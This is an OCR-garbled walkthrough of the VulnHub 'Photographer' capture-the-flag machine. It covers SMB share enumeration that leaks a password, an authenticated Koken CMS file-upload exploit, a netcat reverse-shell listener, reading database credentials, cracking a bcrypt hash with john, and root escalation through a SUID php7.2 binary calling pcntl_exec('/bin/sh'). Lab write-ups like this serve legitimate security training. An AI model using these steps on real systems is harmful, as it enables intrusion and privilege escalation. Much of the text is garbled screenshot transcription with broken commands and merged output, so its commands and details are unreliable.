vulnhub

View on GitHub

Photographer

22 June 2022 08:33 PM

(kaliS $ searchsploit Koken 0.22.24 Exploit Title 1<0 ken CMS 4 - Arbitrary File Upload (Authenticated) I Path I php/webapps/48706.txt

kali@ kali smbmap -H 192.168.43 .174 [+] Guest session 192.168.43.174 Disk print$ w: 192.168.43.174. • 445 Name: sambashare IPC$ kaliS Permissions NO ACCESS READ ONLY NO ACCESS Comment Printer Drivers Samba on Ubuntu IPC Service (photographer se

H kali@ kali smbclient Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: Is mailsent.txt wordpress . bkp. zip N o 503 N 13930308 Mon Jul 20 2020 Tue Jul 21 2020 Mon Jul 20 21 : 29:40 2020 Mon Jul 20 21:22:23 2020 278627392 blocks of size 1024. 264268400 blocks smb: \> more mailsent.txt available getting file \mailsent.txt of size 503 as /tmp/smbmore.TagfyE (81.9 KiloBytes/sec)

Message-ID: Date: Mon, 20 Jul 2020 -0400 From: Agi Clarence User-Agent: Mozi11a/5.O (Windows; U; Windows NT 5.1; en-US; rv:l.ø X-Accept-Language: en-us, en MIME-Version: 1.0 To: Daisa Ahomi Subject: To Do - Daisa Website's Content-Type: text/plain; charset=us-ascii; content-Transfer-Encoding: 7bit Hi Daisa! Your site is ready now. Don't forget your secret, my babygirl (END format-flowed

for conformation

O a 192.168.43.174:8000/admin/#/library/content/quick_collection:true Google Hacking DB VigenereSolver - ww... LxdPrivilege Escalatio... GTFOBins Basic Linux Privilege E... , pueLtSHE0 2020 Online - Reverse Shell Selection is empty Beyond SOLi: Obfusca... GitHub - bonsaiviking/... Write-up] Vulnix e MDS Online I Free MD... View site daisa ahomi 7712022 s pm

o a 192.168.43.174:ecoı:. Google HackingDB VigenereSolver-ww... @ Lxdprivilegel Site settings stora aş Eatwed tmh 2020

rename the file name

https://www.exploit-db.com/exploits/48706 then forward

kali —L/vulnhub/photogra/wordpress/wp-includes nc -nvlp 4444 listening on [any] 4444 connect to [192.168.43.208] from (UNKNOWN) [192.168.43.174] 4 Linux photographer 4.15.ø-107-generic #108-16.04.1-Ubuntu SMP 12:52:14 up 41 min, load average: 0.00, 0.01, 0.0 O users, USER TTY FROM LOGINO IDLE JCPU PCP /bin/sh: O: can't access tty; job control turned off $ $ id

user_password_here

cat /var/w.%/html/koken/storage/configuration/datab <?php return array( 'hostname' 'localhost' , 'database' 'koken' , •username' 'kokenuser' ' password' 'user_password_here' , 'prefix' 'koken_' , 'socket' ' nwq-dataaphotographer : /home$ 1

mw-dataöphotographer:/home$ mysql -u kokenuser -p Enter password: welcome to the MariaDB monitor. comands end with ; or Your MariaDB connection id is 256 server version: 1ø.ø.38-MariaDB-øubuntuø.16.ø4.1 Ubuntu 16.ø4 Copyright (c) 2øøø, 2ø18, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [ (none)]> show databases; I Database I information_schema I I koken 2 rows in set (0.03 sec) MariaDB [(none)]> use koken Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed MariaDB show Tables in koken koken_slugs koken_tags tables; koken albums koken_applications koken_categories koken content koken drafts koken_history koken koken albums content —)01n_ —join_ koken albums covers koken koken albums text —)01n_ —join_categories_content koken koken —j0in_categories_text —join_content_tags koken koken koken_plugins _ settings koken koken text koken trash koken urls koken users

select * from users;

(kaliS —/Desktop/ctf/vu1nhub/photogra $ john --wordlist=/usr/share/wordlists/l [sudo] password for kali: using default input encoding: UT F-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 Cost 1 (iteration count) is 256 for all loaded Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other babygirl lg DONE (2022-06-22 13:19) 4.761g/s "—show" option to display all of the c Use the Session completed.

nothing interseting found same passwd babygirl

-rwsr-xr - 1 1 -rwsr-xr-x 1 -rwsr-sr-x 1 -rwsr-xr-x 1 -rwsr-xr -x 1 -rwsr-xr-x 1 -rwsr-xr-x -rwsr-xr 1 -rwsr-xr-x 1 -rwsr-xr -x 1 -rwsr-xr -x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr -x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr-x 1 -rwsr-xr -x root root root root root root root root root root root root root root root root root root root root root messagebus 42K Jun 11 2020 /usr/lib/dbus-l.ø/dbus-daemon-launch-helper root 10K Mar 27 root 11K Oct 25 root 109K Jul 10 root 419K Mar 4 root 19K Mar 18 root 15K Mar 27 dip 386K Feb 11 2017 /usr/lib/eject/dmcrypt-get-device 2018 /usr/lib/xorg/Xorg.wrap 2020 /usr/lib/snapdi snap-confine 2019 /usr/lib/openssh/ssh-keysign Ubuntu_snapd 2017 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox 2019 /usr/lib/policykit-l/polkit-agent-helper-l root root root root root root root root root root root root root 23K Mar 27 53K May 16 39K May 16 74K May 16 4.7M Jul 9 134K Jan 31 2020 /usr/sbin /pppd 2019 /usr/binZplcexec 2017 /usr/bin /passwd 2017 /usr/binlnevvevp 2017 /usr/bin/gpasswd /usr/bin/php7.2 2020 2020 /usr/bin 40K 49K 44K 31K 40K 44K 27K May May May Jul May May May 16 16 7 12 16 7 16 2017 2017 2014 2016 2018 2014 2018 /usr/bin/chsh /usr/binkchün /bin/ping /bin/fusermount /bin /bin/ping6 /bin Linuxo.10 to 5.1.17(CVE-2 HP-UX 10.20 (Unknown SUID binary suSE_9.3/10 Apple_Mac_OSX(Lion)_l(erne1_xnu BSD/Linux(08-1996)

w.w-da taaphotographer : /tmp$ # id whoami root # cd / root proof. txt # cat proof. txt php7.2 -r oyo/o- . :o: -o:-syh//. ++.-ys/:/y- o/ :yo-:hNN ++ soh-/mMMN-- . •Y /++:NMMMY-. "pcntl_exec( ' /bin/sh' , 00. —/+/ ./ys/-.o/ . MNs .1+0 -- s .-/MMMd-o:+ -S ---:hMMMmoss: +/ s- h h s: S— hMMMN' shY0+: . -/+syd+ : MMMMO - MMMMMY . /MMMMMd: +mMMMMN —dMMMMd MMMMMMd /hdh+ .. 4/. -ohdy --mMMMMMm ./NMMMMS mmNh dMMMMd : /MMMMNmmmmd/ s- : o sdmmmmMMMMN. SMMMMMMMMS. - hMMMMMMMM/ hMMMMMMN+ +mMMMMMNhd+h/+h+dhMMMMMMd: . SNMMMMMMMMMMMMMMMMMMmo/ . h s. o. s- -s.